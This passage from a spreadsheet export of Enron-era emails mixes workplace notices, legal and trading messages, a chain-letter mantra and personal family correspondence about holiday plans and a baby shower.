&gt;   &gt; &gt; &gt; &gt; &gt;       Responsibility for all your actions._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 4.Remember that not getting what you want is_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; sometimes a wonderful stroke of luck._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 5. Learn the rules so you know how to break them_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; properly._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 6. Don't let a little dispute injure a great_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; friendship._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 7. When you realize you've made a mistake, take_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; immediate steps to correct it._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 8. Spend some time alone every day._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 9. Open your arms to change, but don't let go of_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; your values._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 10. Remember that silence is sometimes the best_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; answer._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 11. Live a good, honourable life. Then when you_x000D_
&gt;   &gt; &gt; &gt; &gt; get_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; older and think back, you'll be able to enjoy it_x000D_
&gt;   &gt; &gt; &gt; a_x000D_
&gt;   &gt; &gt; &gt; &gt; second time._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 12. A loving atmosphere in your home is the_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; foundation for your life._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 13. In disagreements with loved ones, deal only_x000D_
&gt;   &gt; &gt; &gt; &gt; with_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; the current situation. Don't bring up the past._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 14. Share your knowledge. It's a way to achieve_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; immortality._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 15. Be gentle with the earth._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 16. Once a year, go someplace you've never been_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; before._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 17. Remember that the best relationship is one_x000D_
&gt;   &gt; &gt; &gt; in_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; which your love for each other exceeds your need_x000D_
&gt;   &gt; &gt; &gt; &gt; for each other._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 18. Judge your success by what you had to give_x000D_
&gt;   &gt; &gt; &gt; up_x000D_
&gt;   &gt; &gt; &gt; &gt; in_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; order to get it._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 19. Approach love and cooking with reckless_x000D_
&gt;   &gt; &gt; &gt; &gt; abandon._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; FORWARD THIS MANTRA E-MAIL TO AT LEAST 5 PEOPLE_x000D_
&gt;   &gt; &gt; &gt; &gt; AND_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; YOUR LIFE WILL IMPROVE._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 0-4 people: Your life will improve slightly._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 5-9 people: Your life will improve to your_x000D_
&gt;   &gt; &gt; &gt; liking._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;  &gt;&gt;_x000D_
&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 3 Nov 2000 01:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Movie Tickets</t>
  </si>
  <si>
    <t>I am at EB3116e._x000D_
_x000D_
CD</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 01:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Baby Shower</t>
  </si>
  <si>
    <t xml:space="preserve">Whew!! Your schedule makes me tired!  I am sure that Brigeda is happy that _x000D_
you are involved in so many activities with her school - and then on the _x000D_
other hand, sometimes you wonder if they notice!  Work sounds crazy for you, _x000D_
but how nice that you will be off from December 21 until the 2nd.  _x000D_
_x000D_
I hope that make it over the week before Christmas.  The week is kind of _x000D_
crazy for us, so I am trying to find a time that will work.  Sunday the 17th _x000D_
we are having a dessert party at our house, inviting neighbors, old Huntwick _x000D_
friends, etc.  It is for families, and Meagan and Amanda each included 4 of _x000D_
their friends in the invitiation list, along with their familities.  It will _x000D_
be multi-generational - I hope fun, as it would be a nice tradition to _x000D_
continue.  On Monday, I think that David plans to take Tyler and Amanda to _x000D_
Longview for a visit.  A commitment that Meagan and I have to sort toys at _x000D_
Northwest Assistance Ministries from 12:30 to 4:00 that day has excused us _x000D_
from the trip.  So it may be best for Meagan and me to drive over to Austin _x000D_
after 4:00 on Monday.  We could be back by the time David and company return _x000D_
to Houston on Tuesday afternoon.  Wednesday we have matinee tickets to see A _x000D_
Christmas Carol at the Alley  Theater, sans Tyler.  Thursday I am having all _x000D_
of my girls in NCL over to wrap gifts for the family that we have adopted for _x000D_
Christmas and then we will deliver the presents.  And Friday is Tyler's _x000D_
birthday, with a 102 Dalmation theme planned (cake ordered from RJ Goodies, _x000D_
but nothing else done yet!).  So I really think that our only shot to make it _x000D_
to Austin is for Monday night, which would mean only Meagan and me.  _x000D_
_x000D_
I talked with Mom last night and invited Dad and her to Houston for _x000D_
Christmas.  I don't really think that they will come, but if they do, I hope _x000D_
that doesn't mess up your Christmas.  They have only been here for one or two _x000D_
Christmases with us since we have had kids.  I think that Tyler at 3 this _x000D_
year will be particularly enthralled.  And next year they will have 2 _x000D_
grandchildren in Austin, so it just seemed that this could be a good year for _x000D_
them to come.  She said she would think about it, and I told her that I _x000D_
wanted her to know that we would love to have them, but that it was perfectly _x000D_
okay if they decided that they did not want to come.  _x000D_
_x000D_
How about Dad playing golf this week?  What a difference!! I am so glad that _x000D_
he is doing better.  _x000D_
_x000D_
I hear you about Mom.  I think that a blow-up or some drama is highly _x000D_
predictable, unfortunately.  She seems to do that a lot at special occassions _x000D_
for Cara, doesn't she?  I will certainly help in any way I can.  And I will _x000D_
be very interested in the gosipy details.  _x000D_
_x000D_
Happy baking!    I do have to make 5 batches of fudge tonight and tomorrow _x000D_
night so that I can attend a cookie exchange luncheon on Saturday armed with _x000D_
27 packages of fudge.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Cindy White" &lt;cwhite@viviance.com&gt; on 12/07/2000 09:25:44 AM_x000D_
To: &lt;Sally.Beck@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE: Baby Shower_x000D_
_x000D_
_x000D_
Got your message last night--sorry I missed you--must have been in the_x000D_
shower.  We are all going nuts here, too.  We have a huge deadline here at_x000D_
work.  But I worked most of last weekend so am ahead of the curve.  Good_x000D_
thing, since I have volunteered to be Martha Stewart at many school events_x000D_
this week and next.  LAst night was "lessons and carols" by the school_x000D_
choir--with me decorating, baking, and coordinating.  Today I go to school_x000D_
to make Christmas stockings with the kids--Sunday is the school Christmas_x000D_
Bazaar at the Four Seasons--need to bring an item for the bake sale.  Also_x000D_
need to start baking 12 gingerbread houses for Brigeda's class.    Did find_x000D_
a matching mold to the smaller one we have so I can at least bake two at_x000D_
once--twelve bakes is MUCH better than 24!  And then there is that dollhouse_x000D_
that needs my attention by the 25!_x000D_
_x000D_
I am totally ok with us not doing the shower.  We get credit for offering_x000D_
but don't have to do anything.  Both money and time are in such short supply_x000D_
for me that it works out for the best.  At work we start on a contract for_x000D_
Dell in January.  The company is also going to pay for Java programming_x000D_
classes for some of us (if I can nail this down then I can jump up to a_x000D_
programmer level on that pay scale).  I also have a private contract job_x000D_
with a needlepoint store in Memphis to setup their website._x000D_
_x000D_
Am somewhat concerned that Mother will have one of her dramas when Cara's_x000D_
baby comes...you know she will get her feelings hurt somehow.  Not to_x000D_
mention the fact that she will be sharing the grandchild with "the most_x000D_
selfish woman on earth."  Richard and Brigeda went out to the Lowrimore farm_x000D_
(they sold it and offered us all of the firewood).  Jane couldn't have been_x000D_
sweeter to Brigeda--spent a lot of time with her.  Can just imagine that_x000D_
"pained" look in Mother's face at the hospital.  If you are not here may_x000D_
need you to carry your cell phone so I can call for moral support--or at_x000D_
least give you gossipy updates on the drama...._x000D_
_x000D_
Are you planning to come later this month when you are off?  I'm taking off_x000D_
the 21st and 22nd--they have given all of the technical production staff the_x000D_
days between Christmas and New Years as comp time so I will be off until the_x000D_
2nd..._x000D_
_x000D_
Cindy_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sally.Beck@enron.com [mailto:Sally.Beck@enron.com]_x000D_
Sent: Wednesday, December 06, 2000 6:51 PM_x000D_
To: 'cwhite@viviance.com'_x000D_
Subject: Baby Shower_x000D_
_x000D_
_x000D_
Well, she declined our kind offer, didn't she?  As busy as life is between_x000D_
work and home for me right now, I can't say that it will bother me too much_x000D_
to attend a shower where someone else makes the finger sandwiched and_x000D_
punch!  Do be on the look out for the perfect pack of diaper pins.  I_x000D_
noticed some at a rack at Randall's the other day... (Just kidding!)_x000D_
_x000D_
Hope you all are doing fine.  I was on jury duty three days last week -_x000D_
really interesting, but totally screwed up my schedule at work.  I have_x000D_
been doing double-time to try to catch up, especially since I plan to be_x000D_
off the week of December 18th._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 07:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Smith Barney AAA Energy Fund L.P.</t>
  </si>
  <si>
    <t xml:space="preserve">Please prepare a draft isda for this hedge fund ASAP.  Before actually _x000D_
distributing this ISDA, please give me word that it is ready in the event _x000D_
that Bill wants to tweak something._x000D_
</t>
  </si>
  <si>
    <t>frozenset({'zionette.vincent@enron.com'})</t>
  </si>
  <si>
    <t>EB3267 - phone interview w/ Samantha Law</t>
  </si>
  <si>
    <t xml:space="preserve">CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	EB3267 - phone interview w/ Samantha Law _x000D_
_x000D_
Date:		1/26/2001_x000D_
Time:		2:15 PM - 3:00 PM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Stacey W White_x000D_
_x000D_
Detailed Description:_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 May 2001 10:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: One more try</t>
  </si>
  <si>
    <t>have you guys reserved a room for caymen yet?   i heard the comfort suites is where everyone is staying.  let me know if you guys just want to load everyone up in one room like back in high school.</t>
  </si>
  <si>
    <t>Fri, 25 May 2001 02:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'melinda.mccarty@enron.com', 'vance.meyer@enron.com', 'pat.radford@enron.com', 'james.steffes@enron.com', 'christie.patrick@enron.com', 'mark.palmer@enron.com', 'karen.denne@enron.com', 'ann.schmidt@enron.com', 'richard.shapiro@enron.com', 'michael.rosen@enron.com'})</t>
  </si>
  <si>
    <t>Presidential Smarts</t>
  </si>
  <si>
    <t>----- Forwarded by Cindy Derecskey/Corp/Enron on 05/25/2001 09:12 AM -----_x000D_
_x000D_
	"Frank Tikasz" &lt;tikasz@look.ca&gt;_x000D_
	05/24/2001 09:09 PM_x000D_
		 _x000D_
		 To: "Cindy Derecskey" &lt;Cindy.Derecskey@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Presidential Smarts_x000D_
_x000D_
_x000D_
_x000D_
?_x000D_
 - untitled.bmp</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 15:14:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'paul.choi@enron.com', 'miguel.garcia@enron.com', 'fang.chang@enron.com', 'rogers.herndon@enron.com', 'janice.moore@enron.com', 'laura.dewett@enron.com', 'diana.allen@enron.com', 'chad.starnes@enron.com', 'genia.fitzgerald@enron.com', 'v..porter@enron.com', 'amy.clemons@enron.com', 'jeffrey.miller@enron.com', 'paul.lewis@enron.com', 'keith.comeaux@enron.com', 'smith.day@enron.com', 't..kelley@enron.com', 'monika.causholli@enron.com', 'm..king@enron.com', 'rhonda.robinson@enron.com', 'dean.laurent@enron.com', 'mark.confer@enron.com', 'tom.moran@enron.com', 'jeff.richter@enron.com', 'anna.santucci@enron.com', 'godfrey.hyde@enron.com', 'joe.quenet@enron.com', 'bert.meyers@enron.com', 's..landry@enron.com', 'larry.alton@enron.com', 'cara.semperger@enron.com', 'steve.gim@enron.com', 'john.malowney@enron.com', 'claudia.guerra@enron.com', 'billy.braddock@enron.com', 'mark.guzman@enron.com', 'maria.valdes@enron.com', 'joe.errigo@enron.com', 'joseph.wagner@enron.com', 'lester.rawson@enron.com', 'robert.benson@enron.com', 'kimberly.hundl@enron.com', 'kerri.thompson@enron.com', 'jeff.king@enron.com', 'kate.symes@enron.com', 'justin.laverell@enron.com', 'm..driscoll@enron.com', 'stewart.rosman@enron.com', 'jesse.bryson@enron.com', 'karla.compean@enron.com', 'ricardo.perez@enron.com', 'chris.mallory@enron.com', 'sharen.cason@enron.com', 'ann.murphy@enron.com', 'tanya.rohauer@enron.com', 'marcus.nettelton@enron.com', 'eric.saibi@enron.com', 'doug.gilbert-smith@enron.com', 'kim.theriot@enron.com', 'russell.diamond@enron.com', 'michael.kelly@enron.com', 'michael.etringer@enron.com', 'terri.clynes@enron.com', 'chris.lenartowicz@enron.com', 'n..stewart@enron.com', 'janet.moore@enron.com', 'chris.dorland@enron.com', 'mike.self@enron.com', 'russell.ballato@enron.com', 'david.fairley@enron.com', 'gerald.gilbert@enron.com', 'joseph.piotrowski@enron.com', 'tom.alonso@enron.com', 'corry.laura@enron.com', 'r..brackett@enron.com', 'bill.rust@enron.com', 'greg.trefz@enron.com', 'brett.hunsucker@enron.com', 'veronica.gonzalez@enron.com', 'john.forney@enron.com', 'benjamin.rogers@enron.com', 'stanley.cocke@enron.com', 'david.ryan@enron.com', 'clint.dean@enron.com', 'sean.crandall@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'david.portz@enron.com', 'karen.lambert@enron.com', 'erik.serio@enron.com', 'hai.chen@enron.com', 'michael.jacobson@enron.com', 'fletcher.sturm@enron.com', 'kevin.presto@enron.com', 'leslie.hansen@enron.com', 'patrick.hanse@enron.com', 'tim.belden@enron.com', 'mark.fischer@enron.com', 'wendy.conwell@enron.com', 'rebecca.grace@enron.com', 'stacey.white@enron.com', 'andy.pace@enron.com', 'evelyn.metoyer@enron.com', 'richard.broussard@enron.com', 'andrea.dahlke@enron.com', 'rika.imai@enron.com', 'mitch.robinson@enron.com', 'lisa.brown@enron.com', 'kevin.cline@enron.com', 'paul.schiavone@enron.com', 'lawrence.clayton@enron.com', 'juan.padron@enron.com', 'janelle.scheuer@enron.com', 'thresa.allen@enron.com', 'dana.christian@enron.com', 'kayne.coulter@enron.com', 'kim.amy@enron.com', 'casey.evans@enron.com', 'jason.choate@enron.com', 's..kimberly@enron.com', 'elsie.lew@enron.com', 'gary.justice@enron.com', 'eric.smith@enron.com', 'larry.campbell@enron.com', 'todd.decook@enron.com', 'paul.sims@enron.com', 'marilyn.tisdale@enron.com', 'r..williams@enron.com', 'tom.may@enron.com', 'rudy.acevedo@enron.com', 'd..baughman@enron.com', 'paul.broderick@enron.com', 'madhup.kumar@enron.com', 'phillip.platter@enron.com', 'mike.curry@enron.com', 'steve.olinde@enron.com', 'mike.carson@enron.com', 'matt.motley@enron.com', 'vivien.pham@enron.com', 'valarie.sabo@enron.com', 'tracy.ngo@enron.com', 'christi.nicolay@enron.com', 'paul.radous@enron.com', 'melissa.ratnala@enron.com', 'robert.stalford@enron.com', 'c..hall@enron.com', 'george.diaz@enron.com', 'joy.werner@enron.com', 'doug.sewell@enron.com', 'joe.gordon@enron.com', 'clayton.vernon@enron.com', 'amy.smith@enron.com', 'george.wood@enron.com', 'holden.salisbury@enron.com', 'grace.kim@enron.com', 'gautam.gupta@enron.com', 'lisa.lees@enron.com', 'joe.stepenovitch@enron.com', 'robert.badeer@enron.com', 'brant.reves@enron.com', 'oscar.dalton@enron.com', 'jim.homco@enron.com', 'john.llodra@enron.com', 'zachary.sampson@enron.com', 'lloyd.will@enron.com', 'leaf.harasin@enron.com', 'ryan.slinger@enron.com', 'gretchen.lotz@enron.com', 'elizabeth.sager@enron.com', 'larry.valderrama@enron.com', 'gwendolyn.williams@enron.com', 'alicia.nguyen@enron.com', 'edward.sacks@enron.com', 'narsimha.misra@enron.com', 'd.thomas@enron.com', 'matt.lorenz@enron.com', 'bill.williams@enron.com', 'holli.krebs@enron.com', 'posey.martinez@enron.com', 'doug.keller@enron.com', 'sharon.fredrick@enron.com', 'mike.swerzbin@enron.com', 'tom.dutta@enron.com', 'peter.makkai@enron.com', 'wayne.vinson@enron.com', 'juan.hernandez@enron.com', 'geir.solberg@enron.com', 'alex.wong@enron.com', 'diana.scholtes@enron.com', 'stephanie.rod@enron.com', 'mark.symms@enron.com', 'leslie.reeves@enron.com', 'h..foster@enron.com'})</t>
  </si>
  <si>
    <t>Fri, 27 Jun 1997 01:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Joe Hirko, PGE in your office</t>
  </si>
  <si>
    <t>_x000D_
Rick Shapiro_x000D_
Portland registration in cal_x000D_
Former CEC commissioner -- Bob Mussiter</t>
  </si>
  <si>
    <t>Fri, 9 Jun 2000 06:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Accomplishments</t>
  </si>
  <si>
    <t>1.  I have learned how to prepare the NGP&amp;L._x000D_
_x000D_
2.  I have gained an understanding of the originations process in order to _x000D_
properly represent originations on the NGP&amp;L._x000D_
_x000D_
3.  I have learned how to prepare the Benchmark._x000D_
_x000D_
4.  I have reduced the time spent at night running the Basis reports by _x000D_
consolidating the Shankman, Fletch, and Lavorato reports into one file so _x000D_
that the information                need only be queried once.  This was _x000D_
accomplished by creating multiple Date Bucket designations in a single file.  _x000D_
_x000D_
5.  I updated the Greg Pos. Report, so that it ties to the Benchmark in total _x000D_
and reflects the Lavorato time buckets._x000D_
_x000D_
6.  I updated the Gas Detail Tab of the Benchmark to include new books that _x000D_
have been added to the Benchmark.  This enabled me to tie the Greg Pos Report _x000D_
to the Benchmark._x000D_
_x000D_
7.  I created an additional section of the Gas Detail Tab to calculate the _x000D_
fixed price positions.  This section is used to report the total fixed price _x000D_
position by seasonal buckets on the Lavorato Basis report.  _x000D_
_x000D_
I have not included any accomplishments from my former group.  If you would _x000D_
like to see them also please let me know._x000D_
_x000D_
Thanks,_x000D_
Robin</t>
  </si>
  <si>
    <t>Thu, 18 Jan 2001 07:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>natsource checkout</t>
  </si>
  <si>
    <t>missing deal_x000D_
_x000D_
trader??   sorry_x000D_
buying aep_x000D_
108.50_x000D_
25 mw_x000D_
pv_x000D_
cal 02_x000D_
_x000D_
thanks</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 13:34:49 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mawhitt@aol.com'})</t>
  </si>
  <si>
    <t>Re: FW: PT?</t>
  </si>
  <si>
    <t>OOOOOPPPPSS!!!!!!!!! _x000D_
_x000D_
What does Paulie say to that?  He must be telling her what she wants to hear or else she is reading more into things.  I really do think she really just wants to have fun!!  But as stated earlier we all know where that can lead!</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 04:35:50 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">The following servers will be coming down, please click on the icon for more details and scheduled times :_x000D_
_x000D_
_x000D_
-------------------------------------------------------------_x000D_
_x000D_
          SYSTEM OUTAGE NOTIFICATION      _x000D_
_x000D_
-------------------------------------------------------------_x000D_
_x000D_
FOR:  PR2 - HR Production_x000D_
_x000D_
_x000D_
Outage Start: (CST) 5/20/2001 at 07:00:00 AM_x000D_
_x000D_
Outage End: (CST) 5/20/2001 at 10:00:00 AM_x000D_
_x000D_
Outage Abstract:  PR2 will be shutdown for new parameters to take effect._x000D_
_x000D_
Outage Description: PR2 will be shutdown for new parameters to take effect._x000D_
_x000D_
Outage Implication: Production SAP and eHRonline will not be available during the outage.  _x000D_
_x000D_
Contact Name:Paul Calvino   #:  800-383-3929_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 03:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FERC ruling on Kern expansion</t>
  </si>
  <si>
    <t>I think we said we'd call you at 3:00 p.m. CDT.   See 'ya then._x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Dasovich, Jeff  _x000D_
Sent: Monday, April 09, 2001 10:21 AM_x000D_
To: Fawcett, Jeffery_x000D_
Subject: Re: FERC ruling on Kern expansion_x000D_
_x000D_
Hmm. Interesting.  Thanks for the info.  Do we know who got to Breathitt?  _x000D_
Forgive me, but what time did we pick to talk today?  And will you call me?_x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Wed, 1 Mar 2000 04:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Do I need to bring a pen and paper?  Is that considered "professional"?  I _x000D_
think it would be more impressive if you were taking my notes.  Let me know _x000D_
what you think._x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Yvette G Connevey @ ENRON                           03/01/2000 11:54 AM_x000D_
	_x000D_
_x000D_
To: Lisa Csikos/HOU/ECT@ECT, Daren J Farmer/HOU/ECT@ECT, Mary M _x000D_
Smith/HOU/ECT@ECT, Rita Wynne/HOU/ECT@ECT, Steve Venturatos/HOU/ECT@ECT, Pat _x000D_
Clynes/Corp/Enron@ENRON, Michael Walters/HOU/ECT@ECT, Eric Bass/HOU/ECT@ECT, _x000D_
O'Neal D Winfree/HOU/ECT@ECT, Bryan Hull/HOU/ECT@ECT, David _x000D_
Baumbach/HOU/ECT@ECT_x000D_
cc: Brenda F Herod/HOU/ECT@ECT _x000D_
Subject: _x000D_
_x000D_
REMINDER:_x000D_
_x000D_
Tuesday, March 7th there will be an ENA Gas Assets Meeting with Cliff Baxter _x000D_
and Greg Whalley from 2:00 - 3:00 pm in Conference Room EB5C2._x000D_
_x000D_
Everyone who supports the ENA Gas Assets business is encouraged to attend, _x000D_
this includes each Manager and your groups.  Understanably, you may need some _x000D_
people covering desks and phones who won't get to attend.  For those who will _x000D_
be able to make it, keep in mind we would like to leave everyone with a _x000D_
professional image of our groups.  Please encourage your groups to be there _x000D_
on time if not slightly early and modeling the Enron dress code._x000D_
_x000D_
If you have any questions please call._x000D_
_x000D_
Thank You!_x000D_
Yvette_x000D_
x3.5953_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 29 Nov 2001 17:27:24 -0800 (PST)</t>
  </si>
  <si>
    <t>PLEASE READ - IMPORTANT INFORMATION FOR PARTICIPANTS IN THE ENRON_x000D_
 SAVINGS PLAN</t>
  </si>
  <si>
    <t>Due to current business circumstances, on November 28, 2001, Enron's Board of Directors adopted an amendment to the Enron Corp. Savings Plan.  The amendment includes the following changes, which became effective on November 29:_x000D_
_x000D_
?	Savings Plan contributions that are deducted from your November 30 paycheck will be matched by Enron in cash rather than Enron stock.  The cash match will be placed into the Fidelity Freedom 2000 fund, the default fund for the Plan.  _x000D_
_x000D_
?	After November 30, Enron will no longer match your savings plan contributions.  As an exception, the company will continue the union matching contributions to the Plan._x000D_
_x000D_
?	The Savings Plan has always permitted employees to place their contributions in Enron stock or one or more alternative investment options.  Effective immediately, diversification within the Plan will ALSO be allowed, regardless of your age, from COMPANY contribution accounts.  This removes the restriction for all employees under the age of 50 to diversify the company contributions held in their account.  These accounts include all prior company contributions, QNEC, and company match accounts.  _x000D_
_x000D_
To move funds:_x000D_
On the Web, choose "Savings Plan--Restricted Employer Acct Transfer/Reallocation" from the drop down menu._x000D_
On Voice Response, choose "request for fund transfer/reallocation of your restricted employer accounts."_x000D_
This will allow you to move money from the four formerly restricted accounts: Company Matching, Union Matching, Prior Matching, and QNEC._x000D_
_x000D_
To avoid phone delays, we recommend that you access your account through the web at http://resources.hewitt.com/enron or through benefits.enron.com.</t>
  </si>
  <si>
    <t>Fri, 9 Mar 2001 04:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: ENA/Project Blue Dog: Preliminary Documents</t>
  </si>
  <si>
    <t xml:space="preserve">Hi John,_x000D_
_x000D_
I asked to have ONE guaranty prepared and ONE escrow agreement for Carlos and _x000D_
I to review the forms.  Now I've got two sets of docs sent by two K &amp; S _x000D_
attorneys. _x000D_
_x000D_
Additionally, we are drafting against ourselves.  The letter agreement and _x000D_
the LLC have been given to the counterparty.  Seems to make more sense to _x000D_
wait for comments._x000D_
_x000D_
HELP!!!_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Reuter, Marisa" &lt;MReuter@KSLAW.com&gt; on 03/09/2001 12:16:45 PM_x000D_
To: "'kay.mann@enron.com'" &lt;kay.mann@enron.com&gt;_x000D_
cc: "'carlos.sole@enron.com'" &lt;carlos.sole@enron.com&gt;, "Keffer, John" _x000D_
&lt;JKeffer@KSLAW.com&gt;, "Campbell, Carolyn" &lt;CCampbell@KSLAW.com&gt; _x000D_
_x000D_
Subject: ENA/Project Blue Dog: Preliminary Documents_x000D_
_x000D_
_x000D_
Kay:_x000D_
_x000D_
Attached please find preliminary drafts of the following documents for_x000D_
Project Blue Dog:_x000D_
_x000D_
1. Closing Checklist;_x000D_
2. Revised Draft of Letter Agreement;_x000D_
3. First Amended and Restated LLC Agreement;_x000D_
4. Escrow Agreement;_x000D_
5. Guaranty Agreement;_x000D_
6. Escrow Disbursement Instructions;_x000D_
7. Promissory Note by LLC payable to ENA; and_x000D_
8. Consents of Members and Managers._x000D_
_x000D_
As you review the Letter Agreement, please note the dollar amounts that I_x000D_
inserted are for illustrative purposes only and will need to be changed to_x000D_
reflect the actual amount of the Purchase Price and Development Fee._x000D_
_x000D_
Regards,_x000D_
_x000D_
Marisa_x000D_
_x000D_
 &lt;&lt;2XPB02!.DOC&gt;&gt;  &lt;&lt;2XN302!.DOC&gt;&gt;  &lt;&lt;2XN402!.DOC&gt;&gt;  &lt;&lt;2X_202!.DOC&gt;&gt;_x000D_
&lt;&lt;2xq#03!.DOC&gt;&gt;  &lt;&lt;2XNL02!.DOC&gt;&gt;  &lt;&lt;2XQD01!.DOC&gt;&gt;  &lt;&lt;2xrn02!.DOC&gt;&gt;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 2XPB02!.DOC_x000D_
 - 2XN302!.DOC_x000D_
 - 2XN402!.DOC_x000D_
 - 2X_202!.DOC_x000D_
 - 2xq#03!.DOC_x000D_
 - 2XNL02!.DOC_x000D_
 - 2XQD01!.DOC_x000D_
 - 2xrn02!.DOC_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 12:17:49 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'scottwl@hotmail.com', 'nancy.sellers@robertmondavi.com'})</t>
  </si>
  <si>
    <t>Re: Pick Sheet - Week 8.xls</t>
  </si>
  <si>
    <t>I could save you all a lot of time and effort by doing everyone's picks in a matter of about 2 minutes time...but there might be a small fee involved...(results may vary)_x000D_
_x000D_
_x000D_
_x000D_
&gt;From: "Scott Laughlin" _x000D_
&gt;To: Nancy.Sellers@RobertMondavi.com, mollycoffin@hotmail.com _x000D_
&gt;CC: skmaloney@yahoo.com, cameron@perfect.com, Jeff_Dasovich@enron.com, PSellers@pacbell.net _x000D_
&gt;Subject: Re: Pick Sheet - Week 8.xls _x000D_
&gt;Date: Tue, 23 Oct 2001 17:05:42 _x000D_
&gt; _x000D_
&gt;No, I want her picks! This is going to start a major bidding war... _x000D_
&gt; _x000D_
&gt; _x000D_
&gt;&gt;From: Nancy Sellers _x000D_
&gt;&gt;To: "'Molly Coffin (Hotmail)'" _x000D_
&gt;&gt;CC: 'Sean Maloney' , Cameron _x000D_
&gt;&gt;, Jeff Dasovich , _x000D_
&gt;&gt;"Prentice @ Berkeley" , Prentice _x000D_
&gt;&gt;Sellers , Scott Laughlin _x000D_
&gt;&gt; _x000D_
&gt;&gt;Subject: Pick Sheet - Week 8.xls _x000D_
&gt;&gt;Date: Tue, 23 Oct 2001 08:22:50 -0700 _x000D_
&gt;&gt; _x000D_
&gt;&gt; _x000D_
&gt;&gt; _x000D_
&gt;&gt; _x000D_
&gt;&gt; _x000D_
